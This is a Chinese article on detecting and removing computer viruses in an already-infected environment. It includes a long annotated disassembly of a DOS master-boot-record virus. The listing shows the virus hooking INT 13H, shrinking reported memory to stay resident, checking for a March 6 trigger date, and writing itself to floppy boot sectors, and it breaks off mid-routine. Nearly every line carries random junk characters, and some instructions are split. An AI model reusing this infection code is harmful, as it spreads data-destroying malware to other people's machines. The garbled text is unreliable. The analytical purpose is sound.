近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 i~4:]r22
?? Y40{v(Pi
?? 一 、 带毒环境下检测清除病毒的意义 0L|A
?? >Z/,DIn,I
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 [z?q-$#
?? D:f0Wv
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 {&3n{XrF(
?? `w&|~xT
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 *@/!h2
?? m]V5}-?al
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 !Y5O3^I=u
?? m'Wz0b^BO
?? 二 、带毒环境下检测清除病毒的原理 8c#u"qF
?? ybfNG@N*
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 o-R;EbL
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 ?QZ\KY
BK,=(;d3
Y6V56pOS
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " 2@=JIMtc
病毒体: a(bgPkPP
JMP 01AF ;JMP到01AF RXh/[t+
DB 00 ;病毒标计 bA1uh]oB
DW 00F5 ;此为搬到高位址后,远程跳转指令 XjWoUnz
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX WPLAh_fe
DB 02 JVU:`BH
DW 0003 ;此为软盘识别标记,硬盘为0007 *V>Iv/(
DW EC59 ; U<*ZY` B3
DW F000 ;INT 13H的原入口 ;/$zBr`'
. z!eY=G'
. 1}9@aKM
. D guAeK
. eEXer>Rm
. Q[S""P.Z|
XOR AX,AX ;清除AX 9"oc.ue.2D
MOV DS,AX; ;让DS=0000 Wl}d6ZTm
CLI ;清I标志积存器 ~c+0SuJ
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 /9;)zI
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 (@mvNlc:
MOV SP,AX ;开机时为0000:7CB6 ?-Fp rC
STI ;设I标志积存器 ?~;G)5
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A ~[Mm0L}8
PUSH AX ;用RETF,把程序转到引导或分区表位置 kpcIU7|e
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 (@~d9PvB>
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 !XQG1!|ww
MOV AX,[004E] ;取INT 13H的段地址 2BEF8o]Np
MOV [7C0C],AX ;存到010C 90&ld :97
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 In5'(UHW:
;读写以便传播发作 8I3"68c_a
jCxw|tmgq
MOV AX,[0413] ;取得内存K数,放在AX q@H?ohIH
DEC AX ; 3S ,D~L^
DEC AX ;减2k内存 d0eMDIm3R\
MOV [0413],AX ;存回,通常是638K | x/,
MOV CL,06 ; $Ic:
c
SHL AX,CL ; l}># p'$
MOV ES,AX ;算出减2K后病毒本体的位址 Y;4nIWe
JL
MOV [7C05],AX ;AX存入0105 O:WFh;c
,vl][MhM
;病毒常用手法将系统高段内存减少以便驻留 )EcE{!H6+
;这样可以免于被其他程序覆盖 Ag^Cb'3X
z`]'~
MOV AX,000E ;病毒拦INT 13H JiCDY)bu
;ISR起始的偏移量 Q
>] v?4
MOV [004C],AX ; F`r=M%yh
MOV [004E],ES ;设原为病毒的INT 13H yuWoz*:t
MOV CX,01BE ;病毒长度为1BE 5Z,^46J
MOV SI,7C00 ;从JMP 01AF开始 dr'#
XOR DI,DI ;DI=0 d\+smED
CLD ;清方向标志 (g*2OS
REPZ; Vnlns2pQl
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 XzIhFX6
CS: ;分区表能载入0000:7C00正常运作 H[BY(a@c
JMP FAR [7C03] ;跳到为搬过后的位址 cK"b0K/M?B
XOR AX,AX ;清AX #/\5a;Elc
MOV ES,AX ;ES=0000 |/5j0
INT 13 ;复位磁盘 +h.$<=
PUSH CS ; fE8/tx](
POP DS ;让DS=CS iZyhj%#
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 LcI,Dy|P
MOV BX,7C00 ;读到0000:7C00 76(-!Z@=J
MOV CX,[0008] ;硬盘第0道,第7扇区 TU&gj1
CMP CX,+07 ;比较是否从硬盘启动 17
Hdj
JNZ 0213 ;不是跳0213 4Bsx[~ u&
MOV DX,0080 ;第一硬盘C:第零面 8xW_N"P.>
INT 13 ;用INT 13号中断,读 Tl6%z9rY@
JMP 023E ;跳023E比较日期,发作或正常开机 FhVi|Va
MOV CX,[0008] ;软盘0道,第3扇区 "hdcB
0
MOV DX,0100 ;A:的第0面 !c(B c^
INT 13 ;INT 13读盘
3V>2N)3`A
JB 023E ;失败跳023E 1-!u=]JDE
PUSH CS :''^a
POPES ;让ES=CS ~m2tWi@
MOV AX,0201 ; E`}KVi57
MOV BX,0200 ; #XE`8$
MOV CX,0001 ; E=+v1\t)]
MOV DX,0080 ; a=>PGriL
INT 13 ;读入C:的分区表到0200,以便下面比较 Ew~piuj
JB 023E ;失败跳023E ,Y6Me+5B
XOR SI,SI ;清SI v,#*%Gn`%
CLD ;清方向标志以便比较 ZnVi.s~1V
LODSW ;载入一个WORD到AX pj4M|'F7
CMP AX,[BX] ;比较有无病毒存在..E9AC X`YA JG
JNZ 0287 ;没有则跳0287传染 I@76ABu^
LODSW ;载入一个WORD到AX zc%#7"FM
CMP AX,[BX+02] ;再次确认..0000 &W)Lzpx8c
JNZ 0287 ;没有跳0287 96x0'IsaG
XOR CX,CX ;清CX t>:2F,0K9
MOV AH,04 ; c4E=qgP
INT 1A ;取得日期 cD{I*t$
CMP DX,0306 ;是否为三月六日 Y5M>&}N
JZ 024B ;是跳024B传染 BR;f!
RETF ;把程序交还给引导启动完成 OsAH!e
1A^~gYr
步骤4:病毒INT 13代码分析 |}P4Gr}6
方法:U `'H"|WsT
PUSH DS ;首先把要用到积存器 $$_aHkI j
PUSH AX ;入栈保存 u|t<f`ze
OR DL,DL ;比较是否为软盘 Rrmk\7/
JNZ 002F ;如不是则退出传染 $)t ]av
XOR AX,AX ;AX=0 {p@u H<)
MOV DS,AX ;数据代段=0 ve;#o<
TEST BYTE PTR [043F],01 ;比较是否为A盘 {L^b['h@
JNZ 002F ;不是则退出 &>y[5#qOl
POP AX ;将以上保存积存器 r*'a-2Au
POP DS ;弹栈恢复 hY XH9:
PUSHF ;压栈标志积存器 aVcQ
CS: ;以便执行原INT 13 Rl@k~;VV
CALL FAR [000A] ;执行原INT 13 xrd@GTaI
PUSHF ;再次压栈 {W*_^>;K
CALL 0036 ;以便跳转到传染程序 H.cN(7LXm
POPF ;跳转到执行传染 G41 gil6k
RETF 0002 ;结束中断调用返回 [9| 8p$
POP AX ;恢复 ?$T!=e"
POP DS ;堆栈 s=9gp$9m
CS: ;跳转到原正常INT 13 -F\xZ
JMP FAR [000A] ;地址执行 `&]<_Jc1
'S]7:/CI
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 mv_N ns
Q[+&n*
步骤5:传染过程分析 !.9pV.~
方法:U }#va#Nb(,
对软盘传染过程: #-?C{$2I
PUSH AX ;工 0]%0wbY1
PUSH BX ;作 {YnR]|0&
PUSH CX ;寄 UZ#Yd|'PD
PUSH DX ;存 0*0]RC5?
PUSH DS ;器 c@H:?s!0R
PUSH ES ;入 G
Xx7/ X
PUSH SI ;栈 )* 5R/oy,
PUSH DI ;保存 g#b[-)Qx
PUSH CS ;以压/弹栈方式 ) inhPd
POP DS ;使数据段DS和 FaS}$-0
PUSH CS ;附加段ES均指向 ti$d.Kc(
POP ES ;代码段CS p!5=1$
MOV SI,0004 ;试4次 {nTQc2T?;
MOV AX,0201 ;设置各 Uv|z
c
MOV BX,0200 ;积存器 -ZwQL="t
MOV CX,0001 ;为读软盘 k/[*Wz$W
XOR DX,DX ;引导扇区做准备 "#Ov!t
PUSHF ;压栈标志积存器 ]gI>ay"\QA
CALL FAR [000A] ;正常的INT 13调用 49.
@Uzo
JNB 0063 ;成功则转判断 1haNca_6,
XOR AX,AX ;不成功复位 <5rs~
PUSHF ;磁盘继续读 #m
yiZL%
CALL FAR [000A] ;如果4次 &s m7R i
DEC SI ;均匀不成功 HRP4"#9R
JNZ 0045 ;则退出跳转 ]r++YIg!j
JMP 00A6 ;退出传染 4JF)w;X}
XOR SI,SI ;SI=0以便用 mHcxK@qw
CLD ;LODSW读入软盘 e`gOc*
LODSW ;第1或第2字进行比较 |Yq0zc!
CMP AX,[BX] ;比较如果不包含病毒标志 C/AqAW1
JNZ 0071 ;则跳转写传染 m]LR4V6k|
LODSW ;如果已有标志 rz/^_dV
CMP AX,[BX+02] ;则退出 A0Z<1|6r*
JZ 00A6 ;传染子程序 &+F|v(|r
MOV AX,0301 ;为写盘准备 .
!gkJ
MOV DH,01 ;如果是360K LS1r}cl
MOV CL,03 ;则写到1面0道3扇区 5cLq6[uO
CMP BYTE PTR [BX+15],FD ;比较软盘
Z|zyO-
JZ 0080 ;如果大于360K `-qRZh@ E
MOV CL,0E ;写到1面0道14扇区 {c5%.<O
MOV [0008],CX ;写病毒标志到软盘 m?LnO5Vs
PUSHF ;调用原INT 13 `@.
CALL FAR [000A] ;进行传染 29eg.E
JB 00A6 Z(g9rz']0
MOV SI,03BE ;以下是将正常 FnkB
z5D
MOV DI,01BE ;引导扇区从 2(SK}<X
MOV CX,0021 ;1BE起的21字节内容 MR8\'0]
CLD ;搬移到病毒程序尾部 z@@w?>*
REPZ ;开始复制 cTpmklq
MOVSW /B>p.%M[&
MOV AX,0301 ;写盘功能调用,写一个扇区 8$Igo$U-
XOR BX,BX ;将病毒程序 FCO5SX#-g
MOV CX,0001 ;写入软盘引导扇区内 7+^9"k7
XOR DX,DX ;设置为软盘 F<SCW+>z2a
PUSHF ma4Pmk
CALL FAR [000A] ;执行正常INT 13调用写盘 [Y@?l]&